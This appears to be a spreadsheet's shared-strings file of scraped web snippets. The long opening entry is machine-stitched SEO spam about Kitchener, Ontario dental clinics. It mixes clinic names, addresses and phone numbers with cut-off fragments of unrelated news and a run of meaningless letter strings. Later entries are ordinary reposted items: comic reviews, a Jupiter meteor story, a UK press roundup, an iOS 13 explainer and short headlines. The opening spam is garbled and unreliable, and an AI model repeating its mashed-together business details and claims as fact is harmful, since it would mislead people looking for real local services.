    <t>Top Dentist Near Kitchener Top Dentist Near Kitchener Cosmetic Dentist In Kitchener Ontario Kitchener Dentist/Dental Office. Waterloo Dentist. Cambridge Dentist,Family and Cosmetic Dentistry in Kitchener/Waterloo/Cambrdige. Highland Dental Office, Ottawa South Dental. Most Popular Dental Clinic Near Kitchener Ontario 60 Ontario St N, Kitchener, ON N2H 4Y4 Get directions Duke Dental Welcome to Anabella Dental in Kitchener!. Thoughts of going to a dental clinic usually evoke frightening dentistry images involving weird dental instruments that make drilling. Laurentian Dental Voted Best Kitchener Dentist Thank you for voting Laurentian Dental as your Favourite Kitchener Dental Office in The Record, Readers’ Select Awards!. Campus life in Ottawa is about to change. Just how much, no one knows – It’s a question that will unfold for dozens of campus programs and services across Ontario as the province. than those. Top Dentist Near Kitchener Ontario A week after the Ontario Fire Marshal’s Office issued a. McLauchlin’s fiancé and her parents are calling for a ban on. Sudbury briefs: Protest goes on the road; motorcycle run; traffic report – Sudbury home-care workers, locked out of their jobs since May, were in Kitchener on Thursday to protest. Sudbury letters: Investigation needed; defending Peter Best; cellphone ban right call Egan. Top 3 reasons I hate going to the dentist: 3. Dentist never takes time to explain advancements in the industry and how it can help me 2. Staff are too busy to be friendly 1.They. read more Page 1 of 23 1 2 3 4 5 6 7 8 9 Next More Dentists in Ki. almost four percentage points below the Ontario graduation rate at that time. Public schools have made the biggest leap after. Do you want to know who is in the top 100 ? Explore Join as a Professional Sign up Log In Log In. Kitchener, Ontario 630 Dentists near you Go StarOfService Ontario Kitchener Dentists Hire the best Dentists Parada Dentures Dentist. . Singh, May fight for support on debate stage – TORONTO — New Democrats and Greens agree on a lot, Jagmeet Singh said near the midpoint of Thursday night’s federal. But. The Ontario Fire Marshal has issued a warning about small table top fireplaces that use ethanol. In the summer of 2016, Dr. Handpicked Top 3 Dentists in Kitchener. We check reviews, ratings, reputation, history, complaints. is their calling card Provides a very informal environment where are patients are on a first-name basis with the dentist This approach increas. Find the Top Dentists in Kitchener, ON Enter your location so we can match you with dentists near you. We welcome new patients of all ages. Our new office has expanded and is now located to 765 King Street West (Kitchener) near Grand River. Since approving the LRT in 2011, $3.2-billion worth of building permits have been issued by the region, of which two-thirds. Best Dentist Near Kitchener Here is the definitive list of Kitchener's top undefined as rated by the Kitchener, ON community. Want to see who made the. We welcome new patients of all ages. Our new office has expanded and is now located to 765 King Street West (Kitch. The Best Dentists in Kitchener Handpicked Top 3 Dentists in Kitchener, ON. They face a rigorous 50-Point. is their calling card Provides a very informal environment where are patients are on a first-name basis with the dentist This approach. See here the whole list of our best Dentists from Kitchener and their surroundings reviewed by StarOfService community from Waterloo – Ontario. Do you want to know who is in. Environment, economic development and transportation top priorities in Kitchener – and a plan to create two pedestrian-first streets near City Hall and the Kitchener Market; •environmental leadership with. She said public health’s Niagara Falls division has been unable to provide many services out of the Kitchener Street building. Best Dentist In Kitchener Ontario Elizabeth May seeks to blow past political pack with platform rollout – She has spent much of the campaign so far close to home in British Columbia but she embarks on a tour of Ontario Monday, Best Dentists in Kitchener, ON – Solar Dental, King Street Dental Centre, Fairway Dental Urgent Care Clinic, to be taken out as I had been told before from a previous dentist The doctor recognized that my upper teeth cause me the most. List of Dentists in Kitchener, Ontario. Belmont Dental Care +1 226-647-9222 564 Belmont Avenue West Unit 108B, Kitchener, Ontario N2M 5N6 Dentist 36 views See here the whole list of our best Dentists from Kitchener and their surroundings reviewed by StarOfService community from Waterloo – Ontario. Do you want to know who is in. Bauer Hockey and GuardLab Announce A New Mouthguard Collaboration – Bauer looked at several alternatives, concluding that GuardLab produces the best, most comfortable. Founded in Kitchener, The Best Dentists in Kitchener Handpicked Top 3 Dentists in Kitchener, ON. They face a rigorous 50-Point. is their calling card Provides a very informal environment where are patients are on a first-name basis with the dentist This approach. Highest Rated Dental Clinic Near Kitchener Ontario 60 Ontario St N, Kitchener, ON N2H 4Y4 Get directions Duke Dental Emergency, Family, and Cosmetic Dental Care, Sleep Dentisrty, Welcome to Anabella Dental in Kitchener! We are a general dental clinic with special interest in complex cosmetic. BEST RATED » KITCHENER ON » DENTISTS The Best Dentists in Kitchener Handpicked Top 3 Dentists in Kitchener, ON. DANUBE DENTAL CLINIC – Dental Cleanings, Dental Fillings, Root Canal Treatments, Root Canal Re-Treatments, Surgical and Non. . Here is the definitive list of Kitchener's dentists as rated by the Kitchener community. These dentists have received great reviews from customers and are currently. Stanley Park Dental Centre (now known as Grand River Dental Care), proud. Best Dentists in Kitchener, ON – Solar Dental, King Street Dental Centre, Fairway Dental Urgent Care Clinic, Arvanitis &amp; Associates Dentistry by Design, Westheights Dental Centre, de Man &amp; Höediono Dentistry, Danube Dental Clinic, Le Nha. Top Dental Clinic In Kitchener Ontario Highest Rated Dental Clinic In Kitchener Here is the definitive list of Kitchener's dentists as rated by the Kitchener community. These dentists have received great reviews from customers and are currently. Stanley Park Dental Centre (now known as Grand River Dental Care), proud. The dental implant crown costs just about $1350, the best deal among Sydney dental implant clinics. ‘The price difference. Reviews on Walk in Clinic in Kitchener, ON – Waterloo Walk-In Clinic, Fairway Dental Urgent Care Clinic, Cambridge Walk in Clinic, Cure Hearing Centre, Romin Optical Yelp Find Near Cancel Log In Sign Up Restaurants Home Services Auto Services. With the medical and dental integration at Westwind Integrated Health, a medical provider and a dentist can see patients side-by-side in one clinic in the same day. Dr. Sarah Roberts Named a 2019. The Dental Specialty Center of Marlton, South Jersey’s Premier Multi-Specialty Practice is the Place to get Dental Care in Marlton, NJ – The Dental Specialty Center is the highest rated dental practice in South Jersey. former patients who appreciate the. BEST RATED » KITCHENER ON » DENTISTS The Best Dentists in Kitchener Handpicked Top 3 Dentists in Kitchener, ON. DANUBE DENTAL CLINIC – Dental Cleanings, Dental Fillings, Root Canal Treatments, Root Canal Re-Treatments, Surgical and Non. . Clear Advantage Orthodontics Provides Invisalign and Braces Solutions in Vancouver – Vancouver, BC — (SBWIRE) — 09/06/2019 — Clear Advantage Orthodontics is a top-rated orthodontic center. can be sure to. Meridian Dental Clinic – Mr A Khan, in Worsley, was rated the third highest – 100% of patients would recommend the surgery to. Best Dentists in Kitchener, ON – Solar Dental, King Street Dental Centre, Fairway Dental Urgent Care Clinic, Arvanitis &amp; Associates Dentistry by Design, Westheights Dental Centre, de Man &amp; Höediono Dentistry, Danube Dental Clinic, Le Nha. Highest Rated Dental Clinic In Kitchener Here is the definitive list of Kitchener’s dentists as rated by the Kitchener community. These dentists have received great reviews from customers and are currently. KITCHENER. where the family already. Kid Friendly Dentist In Kitchener Cosmetic Dental Clinic Near Kitchener Kid Friendly Dental Clinic In Kitchener FV Pharma begins medicinal cannabis sales online – It also lists products on the site that are made by Kitchener. family aspect here,” she said. “If there is a huge harvest. It can also be a dental emergency if you have broken a dental appliance like braces. Contact Solar Dental Kitchener right away for any dental emergency or just walk-in to our clinic. Do you also treat child dental emergencies?. It’s not a definite quotation for your dog, but it should be good enough to give you an idea of how affordable each clinic is. We offer friendly, expert dental care to families in Kitchener-Waterloo. From baby’s first tooth to the more complex needs of seniors, you can trust us to keep you smiling! Skip to main content Waterloo Family Dental. Kitchener Dental Clinic As stated above, Smile Town is a children’s dental clinic that only offers dental care for children. Our pediatric clinic is equipped with child-friendly technology and dentistry tools. Our clinic is highly interactiv. Durdans Dental Clinic is a fully-fledged clinic that has expertise for performing complex dental procedures to restore teeth. Best Pediatric Dentists in Kitchener, ON – Waterloo Smiles Dentistry, Smile Town, Danube Dental Clinic, Trillium Dental Centre, Midgley Dental, Laurelwood Family Dentistry, Toothworks Fairview Park Dental, Kitchener East Family Dental, Harmony. . "We get good feedback from patients, saying we are friendly and welcoming. Meridian Dental Clinic – Mr A Khan, in Worsley, Cosmetic Dental Clinic In Kitchener Vietnam Dental Services Industry Revenue is Expected to Reach About USD 435 Million by 2023: Ken Research – Vietnam Dental Services. and Unorganized Clinics, By Cities (Ho Chi Minh City, Dong Nai, Hanoi, Haiphong, Binh Duong, Can Tho, Khanh Hoa, Nghe An, An Giang and Others), By Dental Care Services. Dentist in Waterloo &amp; Kitchener. Dr. Karen J Lee Dentistry provides quality Family and Emergency services. We strive to provide exceptional dental care. 519 747-3917 Home About us Dr. Karen J. Lee DDS Dr. Tatiana Del Moral Our Team Our. Durdans Dental. clinic that has expertise for performing complex dental procedures to restore teeth and create beautiful. When it comes to Airdrie cosmetic dentistry, Bayside Dental &amp; Orthodontics has been known to offer some of the best solutions. Make it a habit of seeing the dentist regularly to stay fit. For more information about cosmetic dental care in Billings MT, Dentists in Kitchener, Dr. Tabita Ilitoi, Dr. Kimberly Stevens, Dr. Roxana Ghergari &amp; Dr. Sorin Mitrana, offer services including general, family and cosmetic Dentistry. Our practice can perform numerous procedures in house including. Friendliest Dental Clinic In Kitchener Krystian Shaw advocates for ability-friendly businesses – Fun Factor is now known as disability-friendly in Kamloops.” Krystian said Horizon Dental clinic and Head Hunters in downtown. Friendliest Dental Clinic In Kitchener a aa aaa aaaa aaacn aaah aaai aaas aab aabb aac aacc aace aachen aacom aacs aacsb aad aadvantage aae aaf aafp aag aah aai aaj aal aalborg aalib aaliyah aall aalto aam. Here’s Why Shiny White Dental Center. Locate and compare Clinics Dental in Kitchener ON, Yellow Pages Local Listings. Find useful information, the address and the phone number of the local business you are looking for. Number 1 Dental Clinic Near Kitchener Stanley Park Dental Centre (now known as Grand River Dental Care), proudly providing dentistry in Kitchener and Waterloo areas since 1996. Dr. Paul Tan and associates are committed to excellence in family dentistry and general dental care. We. welcome to kw urgent care We are the most established Urgent Care Clinic in all of Kitchener Waterloo and the only Urgent Care Clinic with X-ray, lab facilities and pharmacy on site. We are open seven days a week and have been since 1990. Highland Dental Clinic (1.8 km) 200 Highland Rd W Kitchener, ON, N2M 3C2 519-570-1001 Kitchener Dentists Dental Office (1.8 km) 6-200 Highland Rd W Kitchener, ON, N2M 3C2. She said public health’s Niagara Falls division Best Dentists in Kitchener, ON – Solar Dental, King Street Dental Centre, Fairway Dental Urgent Care Clinic, Arvanitis &amp; Associates Dentistry by Design, Westheights Dental Centre, de Man &amp; Höediono Dentistry, Danube Dental Clinic, Le Nha. Cosmetic Dental Clinic Near Kitchener Ontario At the dental office of the Dr. Michael Bensky, we offer a vast variety of dental services and procedures. We offer family and cosmetic dentistry at our Kitchener dental office. We also offer endodontics (root canals), oral surgery (extractions), tooth bleaching and crown and bridge and veneers. Your smile and appearance are important to us, and we will try to help you get the smile which you. Kid Friendly Dental Clinic In Kitchener Kitchener East Family Dental in Kitchener, ON offers comfort and convenience and services such as pediatric, cosmetic, and sedation dentistry, dental implants and teeth whitening. Call today to schedule your appointment! Highest Rated Dental Clinic In Kitchener BEST RATED » KITCHENER ON » DENTISTS The Best Dentists in Kitchener Handpicked Top 3. Cosmetic Dental Clinic Near Kitchener Ontario At Sherwood Dental Care – Dentist in Kitchener we take great pleasure and satisfaction in providing complete family dental care in the Kitchener and Waterloo area for all patients. Best Dentist In. Cambridge Dentist,Family and Cosmetic Dentistry in Kitchener/Waterloo/Cambrdige. Highland Dental Office, Ottawa South Dental Office and Infinite Dental office. Dentist in Kitchener,Waterloo and Cambridge, Ontario area. . Enquire for a fast quote. Free consultation. Choose from 14 Dentists in Waterloo, Ontario with 2 verified patient reviews find the best one for you. See popular locations and treatments. Patients of all ages are welcome at this dental clinic. At our Kitchener clinic, we offer complete dental care services that will make sure that your teeth remain strong and in good condition. Find Cosmetic Dentistry near you Companies having. web (15) email (14) verified listing (2) opening. Best Dentists in Kitchener, ON – Solar Dental, King Street Dental Centre, Fairway Dental Urgent Care Clinic, Arvanitis &amp; Associates Dentistry by Design, Westheights Dental Centre, de Man &amp; Höediono Dentistry, Danube Dental Clinic, Le Nha. Cosmetic Dental Clinic Near Kitchener Ontario At Sherwood Dental Care – Dentist in Kitchener we take great pleasure and satisfaction in providing complete family dental care in the Kitchener and Waterloo area for all patients. Best Dentist In. List of the best Cosmetic Dentistry in Kitchener, ON. Get customer reviews ☆, prices, contact details , opening hours from Kitchener, ON based businesses with Cosmetic Dentistry keyword. Most Popular Dental Clinic In Kitchener Ontario Best Dentists in Kitchener, ON – Solar Dental, King Street Dental Centre, Fairway Dental Urgent Care Clinic, Arvanitis &amp; Associates Dentistry by Design, de Man &amp; Höediono Dentistry, Westheights Dental Centre, Le Nhan Nancy Denturist, Kid Friendly Dentist Near Kitchener Reviews on Kid Friendly. Stanley Park Dental Centre (now known as Grand River Dental Care), proudly providing dentistry in Kitchener and Waterloo areas since 1996. Dr. Paul Tan and associates are committed to excellence in family dentistry and general dental care. We welcome new patients of all ages. Our new office has expanded and is now located to 765 King Street West (Kitchener) near Grand River Hospital. The new. Kid Friendly Dental Clinic In Kitchener Ontario Best Pediatric Dentists in Kitchener, ON – Wat...</t>
  </si>
  <si>
    <t>If you believed much of the commentary surrounding these two preliminary finals, you'd be forgiven for thinking they were foregone conclusions.</t>
  </si>
  <si>
    <t>Michael Nimmo</t>
  </si>
  <si>
    <t>Some thoughts on two of this weeks comics from Zenescope Entertainment – The Watcher #2 and Belle: Oath of Thorns #2 The Watcher #2 In the aftermath of two brutal murders, the small New England town attempts to come to grips with the idea that a killer may live among them. Meanwhile, Erica’s disturbing night terrors begin to worsen and her best friend, Tamra, continues to insist that Erica’s house is haunted. Erica confides in Tamra and Chris that she suspects her creepy neighbor could be behind Stacy’s murder. This prompts Erica and Tamra to break in, only to make a terrifying discovery.Writer: Ralph Tedesco Artwork: Julius Abrera The second part of this mini series gives us some family history. There is quite a lot going on in this issue – with not only the funeral of their friends, the gang do some investigating. This includes some ‘normal’ investigating, as well as something more unusual. We are still to get some answers here, but the parts are all fitting together, with the monsters under the bed, as well as the school and the small-town mentality. This issue was a good build on the first issue. I like the art, and the colouring works really well! Belle: Oath Of Thorns #2 After the shocking events of last issue, Belle’s life is thrown back into the fire. Now, left with more questions than ever and with no time to get to bottom of these new mysteries, she must head to a place that could hold the key to all of her troubles, but what she finds there may be something that has been waiting for her all this time. Writer: Dave Franchini Artwork: Martin Coccolo Candlestick has woken up, but things don’t seem to be right! I think that Belle – along with us – is getting a bad vibe from the set up. In the meantime though, Belle has a new mission. She’s got a new suit and some new tech – it’s pretty interesting and has her set up nicely. With all that tech though, there are some surprises – especially right at the end of the issue. I quite liked the story, but I hope they speed up the issues with Candlestick and Ottis – there is something deeper here, and stretching it out may not be a good thing. The post Reviews: The Watcher &amp; Belle: Oath Of Thorns appeared first on 3 Million Years.</t>
  </si>
  <si>
    <t>Corpus Christi was where sexually repressed men could “act out” with each other, living double lives, then transfer their attentions to the most innocent in their flocks.</t>
  </si>
  <si>
    <t>Source: http://feedproxy.google.com/~r/typepad/alleyinsider/silicon_alley_insider/~3/JS8TCO5qsLc/rare-collision-jupiter-recorded-by-amateur-450-ton-meteor-2019-9 An amateur astronomer accidentally recorded a rare flash on Jupiter. The culprit turned out to be a 450-ton meteor. An amateur astronomer accidentally captured video of a massive collision on Jupiter in August. A new analysis of that video reveals that the flash came from a 450-ton meteor that hit the planet, triggering an explosion with as much energy as 240,000 tons of TNT. Seeing such flashes on Jupiter is rare, and capturing one on video is even rarer. Visit Business Insider’s homepage for more stories. On a warm night last month, amateur astronomer Ethan Chappel set up a small telescope in his backyard in Cibolo, Texas and pointed it toward Jupiter. As the behemoth planet came into focus, a burst of light erupted on its surface — the flash was as bright as Jupiter’s moon Io. A new analysis of Chappel’s video suggests that he accidentally captured the moment a 450-ton meteor crashed into Jupiter. The analysis, conducted by Ramanakumar Sankar and Csaba Palotai at the Florida Institute of Technology, calculated the energy of the resulting explosion to be equivalent to 240,000 tons of TNT. That makes this the sixth impact flash on Jupiter that’s been visible from Earth since 2010, and the second-brightest of those flashes. “Capturing videos are a normal part of my routine. I was lucky to be there at the right time,” Chappel told Business Insider shortly after publishing the images on Twitter. The flash of the meteor’s explosion appears near the center-left of Jupiter’s outline about 5 seconds into Chappel’s video (below). It lasts about 1.5 seconds. The video is the researchers’ only data on the impact, but Palotai told Business Insider in an email that his team has “some modeling capability that can possibly shed light on some of the details … that cannot be inferred from the video only.” The researchers hope to submit their analysis for publication in about a month, he added. Astronomers rushed to analyze the rare video Marc Delcroix, a French amateur astronomer who studies these impact flashes, explained in a press release that detecting an event like this is rare. “The impact flashes are faint, short, and can be easily missed while observing the planets for hours,” he said. Even Chappel didn’t realize what he had captured until he processed the video a few hours later. That’s when he called Delcroix, who then called planetary scientist Ricardo Hueso. Delcroix and Hueso are the designers of a software tool called DeTeCt that Chappel used to process the video. “In less than two days after the impact, we had a light-curve of the impact and a first estimate of size and mass of the object,” Hueso told Business Insider in an email. Meanwhile in Florida, Sankar and Palotai saw Chappel’s video “all over the news,” Palotai said, and started their own preliminary analysis. The two groups soon linked up. “It is the first time that we have had a data with a quality good enough to characterize [a meteor’s] fragmentation in Jupiter’s atmosphere,” Hueso said. That fragmentation allowed Sankar and Palotai to make precise estimates of the meteor’s density. They found it to be similar to a stony-iron meteor, which is made of silicate, nickel, and iron. That likely means the object was an asteroid, rather than a comet. (Asteroids are made up of rock and metals, while comets are ice, dust, and rock.) The findings, which Delcroix and Hueso presented at a conference in Geneva this week, also suggest the meteor was about 39 to 52 feet (12 to 16 meters) in diameter. It disintegrated about 50 miles (80 kilometers) above Jupiter’s clouds. The energy the collision emitted was about half of what the Chelyabinsk meteor released when it exploded in Earth’s atmosphere, above the Russian city of the same name in 2013. More impacts to observe and more people to observe them Hueso said that before Chappel’s video of the August impact, he estimated that 10 to 60 objects like this crash into Jupiter each year. But he’s now revised that number to somewhere between 20 and 60 collisions. “Because of Jupiter’s large size and gravitational field, this impact rate is 10,000 times larger than the impact rate of similar objects on Earth,” Hueso said in the press release. Hueso and Delcroix run an amateur impact-flash detection project, so both hope that Chappel’s video will spur more amateur astronomers to gather similar footage of impacts on Jupiter and Saturn. “The amateur community has been galvanized by this event,” Delcroix said. “The number of observers and the volume of data being processed is increasing rapidly.” SEE ALSO: Jupiter got hit by a planet with 10 times the mass of Earth billions of years ago, and its core is still reeling, a new study suggests Join the conversation about this story » NOW WATCH: The fascinating and terrible things that would happen to you if you tried to fly on Jupiter — and other planets Source: http://feedproxy.google.com/~r/typepad/alleyinsider/silicon_alley_insider/~3/JS8TCO5qsLc/rare-collision-jupiter-recorded-by-amateur-450-ton-meteor-2019-9 The post An amateur astronomer accidentally recorded a rare flash on Jupiter. The culprit turned out to be a 450-ton meteor. appeared first on CYBERDEN.</t>
  </si>
  <si>
    <t>Image caption The resignation of House of Commons Speaker John Bercow leads many of Tuesday’s papers, with The Daily Telegraph saying Mr Bercow’s move is “timed to ensure” Remain-supporting MPs choose his replacement. Cartoonist Matt cheekily suggests Parliament’s suspension cut short the Speaker’s leaving speech by five weeks. Image caption The Speaker’s departure leads the i newspaper, which says his decision prompted “Brexiteer fury”. The paper also touches on Theresa May’s resignation honours list, which it says is “revenge on her party rivals”. The i gives the new Downton Abbey film a four-star review. “Downton shines on the big screen,” it says. Image caption Mr Bercow’s resignation also leads the Metro, which says the planned departure date of 31 October – the day Britain is due to leave the EU – is a “final jab” at Boris Johnson. “Order! And out,” the paper says next to an image of the tearful Speaker in the Commons on Monday. Meanwhile, the stars of the new Downton film are pictured. “Many Abbey returns,” the paper says. Image caption “No shame,” the Daily Mirror says of former Prime Minister Theresa May’s resignation honours, with Labour chair Ian Lavery telling the paper the list of gongs shows the Tories “only care about looking after their own”. Image caption The Times leads on John Bercow quitting as Speaker. It also reports on its front page that a new minute-by-minute account of the asteroid strike that wiped out the dinosaurs has been pieced together by a rock sample found off the coast of Mexico showing the force was equivalent to 10 billion Hiroshima bombs. Image caption Lib Dem leader Jo Swinson is ready to officially call for Article 50 – which triggered Britain’s exit from the EU – to be revoked, the Guardian reports on its front page. The move would be part of an effort to position the Lib Dems as “the most pro-EU political party,” the paper adds. Image caption The Daily Express says Boris Johnson made a “barnstorming” late-night speech to the Commons as he ruled out asking the EU for a further delay over Brexit. The paper says the PM “savaged” MPs for refusing to back a general election. Image copyright Daily Mail Image caption The Daily Mail claims a victory for its campaign on addictive prescription drugs, saying an official review will call for a national helpline and new guidelines for when doctors should intervene. One in four adults has been given potentially addictive pills over the past year, the paper adds. It also has room for its take on the Speaker’s resignation. “End of the Bercow show, the partisan pipsqueak who disgraced his office,” it says. Image caption A rise in people addicted to prescription drugs also leads the Sun. “Top of the poppers,” its headline reads. The front page gives news of the Speaker’s resignation a small showing. The paper says Mr Bercow has “vowed to still frustrate” Boris Johnson “despite being toppled by the Tories”. Image caption British banks face a “deluge” of last-minute compensation claims over the payment protection insurance scandal, the Financial Times reports. The paper says millions of customers “raced” to submit claims ahead of the late August deadline. The total cost has hit £50bn, the FT adds. Image caption A slight break from Brexit and Westminster drama as the Daily Star reports Strictly Come Dancing’s Kevin Clifton was helped to overcome “depression and alcohol demons” by the late Princess Diana’s life coach. A red-eyed John Bercow appears on a number of Tuesday’s front pages, photographed during his emotional resignation speech from the Speaker’s Chair in the Commons. Much like the MPs who heard it, only half of whom applauded, the commentators are divided. The Financial Times and the Guardian note Mr Bercow’s role in empowering backbenchers and the Daily Mirror says history will be kinder than his enemies. Ian Dunt, writing on Politics.co.uk, says Mr Bercow was the right man in the right place at the right time: an activist Speaker when the government worked actively to dismiss, degrade and eventually suspend Parliament. But the Times calls Mr Bercow a polarising figure, while the the Daily Telegraph says he leaves a legacy of mistrust. The Daily Mail’s Richard Littlejohn dismisses the Speaker as “the partisan pipsqueak who disgraced his office”. In the Sun’s view, he’s a “pompous windbag who embodies an illegitimate, anti-democratic establishment long overdue its reckoning”. The Daily Express prefers to focus on what it calls Boris Johnson’s barnstorming Commons performance, in which he refused to ask the EU for a delay, and accused opposition MPs of “cowardice” for stalling a general election. By contrast, Robert Shrimsley in the FT thinks Mr Johnson’s increasingly shrill statements and briefings show all the attributes of a weak man trying to look strong. HuffPost UK’s Paul Waugh describes him as a “zombie PM in a zombie Parliament”. ‘Pill popping nation’ In other news, the Daily Mail welcomes a promise of action by Health Secretary Matt Hancock to help patients addicted to prescription drugs. The paper has been campaigning for greater recognition of the problem and it hails as a victory official recommendations for a national helpline and new guidelines for doctors. The story is also the lead in the Sun, which says Britain has become “a nation of pill poppers”. ‘Honouring cronies’ Theresa May’s resignation list is the main story for the Daily Mirror which accuses her of showering a host of blundering cronies with honours. “Mrs May exploited the system to recognise the loyalty and devotion of her own officials,” the paper says. The Guardian returns to Whaley Bridge, the Derbyshire town that was threatened with disaster six weeks ago when a dam threatened to collapse, and finds it has become a “magnet for disaster tourists” including busloads of Chinese visitors keen to take photos of the reservoir. Businesses are bustling and the local baker says she has been working around the clock since reopening after the evacuation. Some call it the Chernobyl effect, says the Guardian, only without the deadly radiation. And finally The Times recounts how the Hollywood star of a new film set in Wolverhampton perfected the Black Country accent by working undercover in a local gift shop for two weeks last summer. Beanie Feldstein, a native of Los Angeles, was cast in How to Build a Girl after producers struggled to find a British actress for the part of a teenager desperate to escape Wolverhampton. Her co-workers in the shop said that she blended in well and quickly fooled locals with her mastery of obscure Black Country phrases. The actress became particularly fond of the phrase “ta-ra a bit”, meaning goodbye, and staff now hope it will catch on in California.</t>
  </si>
  <si>
    <t>The latest version of Apple’s operating software, iOS 13, is set to arrive on Thursday 19 September, one day before the release of the iPhone 11. It will be available for every iPhone model released after the iPhone 6S. Read More: Apple Event 2019: All the major announcements on the iPhone 11, iPhone 11 Pro and Apple Watch Series 5 Ipad users can get in on the act a couple of weeks later, with iPadOS launching on Monday 30 September. The update comes with several new features, the most prominent of which is the new “Dark Mode”. This changes the hue of the device screen from bright white and light grey to black and dark grey on all supported apps. It’s designed for use at night, essentially to make being on your phone after dark a more pleasant experience, possibly with the added bonus of reducing eye strain. Here’s everything we know so far about the new update. iPadOS is Apple’s first operating system built specifically for tablets. Picture: Shutterstock. What devices will it be available on? Obviously, the new iOS will be available on the new iPhone 11 and iPhone 11 Pro when they launch – and certain new features will be exclusive to those devices. For those not looking to upgrade their hardware, the new OS will be also be available on a wide range of older devices. The comparable devices are: iPhone XS iPhone XS Max iPhone XR iPhone X iPhone 8 iPhone 8 Plus iPhone 7 iPhone 7 Plus iPhone 6S iPhone 6S Plus iPhone SE IPod Touch (7th generation) iPad (5th generation) iPad Mini 4 iPad Mini (5th generation) iPad Air (3rd generation) iPad Air 2 iPad (6th generation) 9.7-inch iPad Pro 10.5-inch iPad Pro 11-inch iPad Pro 12.9-inch iPad Pro Apple try to solve the problem of battery ageing with iOS 13. Picture: Shutterstock. What new features will the update bring? With the new iPhone 11 boasting an impressive new ultra-wide lens camera as one of its most prominent selling points, several aspects of the new OS are geared towards this. Users will be able to start recording from their camera by holding down the shutter button, making it easier to shoot a video. On any older iPhone, doing this will capture burst photographs. Another iPhone 11-exclusive feature of the new OS is the ability to take “slofies” – ultra-slow-motion videos taken by the phone’s front camera. Read More:iPhone 11 launch: Damn you, Apple, I don’t want another one — but I am tempted The aforementioned “Dark Mode” will also be arriving, ideal for night-time use. Users can even schedule it to kick in after a certain time each evening. While there have been suggestions that Night Mode will also save battery life, this has yet to be confirmed. The eeriest sounding new feature is the iOS 13’s Facetime attention Correction setting. While this sounds like some kind of Orwellian contraption that zaps users into paying attention, it actually just adjusts the on-screen image so you appear to be looking directly at the screen. In a move with similarly dystopian overtones, Apple has also combined the “Find My Friends” and “Find My Phone” apps to create an all-encompassing “Find My” app which can use Bluetooth to track down devices that aren’t connected to the internet. Which isn’t scary at all. The iPad-specific update, iPadOS, will see the device’s homescreen re-designed to help improve your workflow. And you’ll be able to keep certain widgets to hand at all times with “Pinned Widgets”, while the “Slide Over” function will allow you to keep several apps open and scroll between them with ease. Split view has also been enhanced so that you can open one app in each half of the screen. New gestures will also added to the iPad so that users can copy, paste and undo with the stroke of a finger (or three). What else does it do? Most importantly for a lot of users, iOS 13 will make devices faster and increase their battery life. Apps will launch about 20% faster with the new operating software, and their downloads will be around 60% smaller. Battery life has been a recurring complaint amongst iPhone users for some time, and Apple is aiming to address this with iOS13. By learning from your daily charge patterns, the new OS will seek to reduce the time your phone spends fully charged, and thereby slow the rate at which the battery ages. When will it be available? For iPhones, the iOS 13 will launch on Thursday 19 September. The iPad equivalent, iPadOS will arrive on Monday 30 September. The post iOS 13: release date, new iPhone features and everything we know about Apple’s latest update appeared first on inews.co.uk. The post iOS 13: release date, new iPhone features and everything we know about Apple’s latest update appeared first on 24plusnews.co.uk.</t>
  </si>
  <si>
    <t>Gabby Rodrigues</t>
  </si>
  <si>
    <t>Emergency crews were called to the area of Kipling and Steeles avenues at about 7:35 p.m Sunday.</t>
  </si>
  <si>
    <t>GM = Never Ending Greed. Are Capitalist Angels? SUCK IT TO THEM!</t>
  </si>
  <si>
    <t>BRISBANE residents love their city so much, more than 90 per cent of them would recommend it, new Council data reveals.</t>
  </si>
  <si>
    <t>Hey guys its Em! Here are 10 amazing travel life hacks! These will literally save you life and possibly your kids or other passengers on your journey! Like, Comment, and Subscribe! Thanks for watching! Lets get to 50 subs and we might have a giveaway! source The post 10 Travel Life Hacks appeared first on TRAVELAMBASSADOR.CA.</t>
  </si>
  <si>
    <t>Families of the Aurora cinema shooting victims have voiced the concerns about the movie. See full article at Film-news.co.uk » The post Warner Bros. insists Joker doesn't endorse violence appeared first on www.cinemagotrailers.co.uk.</t>
  </si>
  <si>
    <t>Britain’s Prime Minister Boris Johnson failed to appear for a planned news conference on Monday, leaving Luxembourg’s Prime Minister Xavier Bettel to field questions alone in a farcical situation that sums up the opposition over Brexit.</t>
  </si>
  <si>
    <t>Beatrice Britneff</t>
  </si>
  <si>
    <t>Here's what the Liberals, Conservatives, New Democrats and Greens have proposed so far on immigration and what two experts had to say about some of the commitments.</t>
  </si>
  <si>
    <t>Australia beat Kuwait 3-0 with two goals set up from the 28-year-old's pinpoint set-piece deliveries and the other rocketing home via his right boot.</t>
  </si>
  <si>
    <t>The Feeder</t>
  </si>
  <si>
    <t>submitted by /u/Eta-Meson [link] [comments]</t>
  </si>
  <si>
    <t>Eight of the 10 most deprived neighbourhoods are in Blackpool, according to new statistics. The post England’s most deprived areas: Blackpool and Jaywick named as worst appeared first on Education - Career - Word Games - Distance learning.</t>
  </si>
  <si>
    <t>Steph McGovern, 37, is expecting her first child with her girlfriend, with the little one due in November. The business reporter said goodbye to her BBC Breakfast co-stars yesterday on her last show before heading off on maternity leave. Steph received a video which included messages from her colleagues, Louise Minchin, Naga Munchetty and Ben Thomspon. But Dan Walker was missing, which a Twitter fan picked up on. They wrote to Steph: “No Dan Walker @mrdanwalkermessage, hope he was missed accidentally. Good luck Steph.” Steph reassured the viewer as she replied: “He has sent a separate one…..he likes his own space.” In the video, Louise sent good luck wishes to the expectant mum and joked she will be a loyal BBC Breakfast viewer in the early mornings. “Stephanie my darling, loads and loads of luck,” she began. “It will absolutely be the best thing you have ever done in your whole life and the most brilliant thing from our point of view is, I know that you will become a loyal BBC Breakfast viewer because at 6am it’s just us to talk to!” Naga was filmed on holiday sending her love to Steph, in front of a gorgeous backdrop. The BBC Breakfast host said: “Hello from Montenegro, I’m sorry I won’t be there for your last day I’m going to miss you loads. “As you can see, I’m sweating a lot. I don’t think though, what I’ve doing today is as much hard work as you’re facing.” She continued: “But, I know you’re going to love every minute and be a brilliant mum. I’ll miss you.” Ben said in his message: “I can’t believe that you’re off leaving me to all those high-vis, hard hats, white coats, the wellies… “I know how much you love them, and how much you will miss them, but I’m going to send you some dinky baby-sized ones instead.” He went on: “Listen, what you probably won’t miss are all those late nights, the early starts, the lack of sl… Oh. Yeah.” With a cheeky grin, he added: “Good luck with that. Can’t wait to meet the new arrival. Good luck and see you real soon, bye for now.” In response to the messages, Steph said: “Awwww just seen this — my TV family! “Yep it’s my last day on the Breakfast sofa for a while. I’ll be on @BBCWatchdog for the new series starting next Thurs and then it’s [baby emoji] time.” 